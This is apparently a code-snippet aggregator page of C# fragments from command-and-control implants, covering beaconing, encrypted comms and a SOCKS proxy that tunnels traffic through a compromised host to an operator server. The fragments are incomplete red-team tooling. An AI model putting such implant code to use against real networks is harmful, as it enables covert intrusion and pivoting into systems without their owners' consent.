Пример #1
0
 public void StartCommandLoop(SocksController loopController)
 {
     _cancelTokenSource = new CancellationTokenSource();
     _cancelToken = _cancelTokenSource.Token;
     _commandChannelLoop = new System.Threading.Tasks.Task((g) => {
         try
         {
             ImplantComms.LogMessage($"Command loop starting - beacon time is {C2Config.CommandBeaconTime}ms");
             if (!CommandLoop((CancellationToken)g))
             {
                 loopController.StopProxyComms();
                 _error.LogError($"Stopping all proxy comms as command channel is now broken");
                 return;
             }
         }
         catch (Exception ex)
         {
             var lst = new List<String>
             {
                 "Error in command channel loop"
             };
             _error.LogError($"Command Channel loop is broken {ex.Message}, hard stopping all connections");
             loopController.StopProxyComms();
             return;
         }
     }, _cancelToken);
     _commandChannelLoop.Start();
 }
Пример #2
0
        public static SocksController CreateSocksController(Uri serverUri, String commandChannelId, String HostHeader, String userAgent, SecureString key, List <String> urlPaths, String sessionCookieName, String payloadCookieName, IWebProxy wbProxy = null, short beaconTime = 5000, IImplantLog implantcomms = null, bool sslFullValidation = false)
        {
            IImplantLog icomms = implantcomms ?? new PoshDefaultImplantComms();
            var         config = new SocksClientConfiguration
            {
                CommandChannelSessionId = commandChannelId,
                BeaconTime        = beaconTime,
                UserAgent         = userAgent,
                CommandServerUI   = serverUri,
                UseProxy          = (null != wbProxy),
                URLPaths          = urlPaths,
                ImplantComms      = icomms,
                HostHeader        = HostHeader,
                PayloadCookieName = payloadCookieName,
                SessionCookieName = sessionCookieName,
                //By Default SSL Validation is disabled this is to aid intitial testing
                //of the deployed infrastructure before a Production Release.
                //It is reccomended that this is enabled before deploying to a full Scenario.
                SSLFullValidation = sslFullValidation
            };

            if (null == key)
            {
                throw new Exception("Encryption key is null");
            }

            var socks = new SocksController(config)
            {
                Encryptor    = new DebugSimpleEncryptor(key),
                ImplantComms = icomms
            };

            socks.Initialize();
            return(socks);
        }
Пример #3
0
 public void DispatchSocksDatagrams(SocksDatagram[] dgs)
 {
     //DebugWriteLine($"Processing {dgs.Length} SocksDatagrams...");
     for (int i = 0; i < dgs.Length; i++)
     {
         //DebugWriteLine($"Datagram #{i + 1} is of length: {System.Convert.FromBase64String(dgs[i].data).Length}");
         SocksController.AddDatagramToQueue(dgs[i]);
     }
     //DebugWriteLine($"Finished processing {dgs.Length} SocksDatagrams!");
 }
Пример #4
0
        private void SendTaskOutput()
        {
            int retryCount = 0;

            Tasks.ApolloTaskResponse[] responses  = JobManager.GetJobOutput();
            SocksDatagram[]            datagrams  = SocksController.GetMythicMessagesFromQueue();
            List <ApolloTaskResponse>  lResponses = new List <ApolloTaskResponse>(); // probably should be used to resend

            if (responses.Length > 0 || datagrams.Length > 0)
            {
                string guid = Guid.NewGuid().ToString();
                while (retryCount < MAX_RETRIES)
                {
                    string result = Profile.SendResponses(guid, responses, datagrams);
                    if (string.IsNullOrEmpty(result))
                    {
                        break;
                    }
                    MythicServerResponse serverReply = JsonConvert.DeserializeObject <MythicServerResponse>(result);
                    foreach (MythicTaskResponse rep in serverReply.responses)
                    {
                        if (rep.status == "error")
                        {
                            lResponses.Add(responses.Single(c => c.task_id == rep.task_id));
                        }
                        else
                        {
                            Inbox.AddMessage(rep.task_id, rep);
                        }
                    }
                    if (serverReply.delegates != null && serverReply.delegates.Length > 0)
                    {
                        DispatchDelegates(serverReply.delegates);
                    }
                    responses = lResponses.ToArray();
                    lResponses.Clear();
                    retryCount += 1;
                    if (responses.Length == 0)
                    {
                        break;
                    }
                }
            }
        }
Пример #5
0
        private void ReadFromProxy()
        {
            ClientConnection.ReceiveTimeout = 10000;
            while (!exited)
            {
                byte[] bufIn     = new byte[MESSAGE_SIZE];
                int    totalRead = 0;
                try
                {
                    ////DebugWriteLine($"Attempting to read data from {IPAddress}");

                    totalRead = ClientConnection.Receive(bufIn);
                }
                catch (SocketException ex)
                {
                    //ExitEvent.Set();
                    DebugWriteLine($"{IPAddress} ({ServerID}) error while reading from socket: {ex.Message} ({ex.SocketErrorCode}).");
                    break;
                }
                catch (Exception ex)
                {
                    //ExitEvent.Set();
                    DebugWriteLine($"{IPAddress} ({ServerID}) Unhandled exception while reading from socket: {ex.Message}");
                    //SocksController.SendDisconnectRemoveConnection(this);
                    break;
                }
                //Console.WriteLine($"Read {totalRead} bytes from {conn.ServerID}");
                if (totalRead > 0)
                {
                    byte[] dataToSend = new byte[totalRead];
                    //DebugWriteLine($"{IPAddress} ({ServerID}) Beginning data copy into new array...");
                    Array.Copy(bufIn, dataToSend, totalRead);
                    //DebugWriteLine($"{IPAddress} ({ServerID}) Finished copying data into new array.");
                    SocksDatagram msg = new SocksDatagram()
                    {
                        server_id = ServerID,
                        data      = Convert.ToBase64String(dataToSend),
                    };
                    SocksController.AddMythicMessageToQueue(msg);
                }
            }
            Close();
        }
Пример #6
0
        public static void Execute(Job job, Agent agent)
        {
            Task task = job.Task;

            JObject json   = (JObject)JsonConvert.DeserializeObject(task.parameters);
            string  action = json.Value <string>("action");

            //SocksParams socksParams = Newtonsoft.Json.JsonConvert.DeserializeObject<SocksParams>(job.Task.parameters);

            switch (action)
            {
            case "start":
                if (SocksController.IsActive())
                {
                    job.SetError("Socks proxy is already active.");
                    return;
                }

                job.OnKill = delegate()
                {
                    SocksController.StopClientPort();
                };

                SocksController.StartClientPort();

                job.SetComplete($"SOCKS server started.");

                break;

            case "stop":
                SocksController.StopClientPort();
                job.SetComplete("SOCKS server stopped.");
                break;

            default:
                job.SetError("Invalid action.");
                break;
            }
        }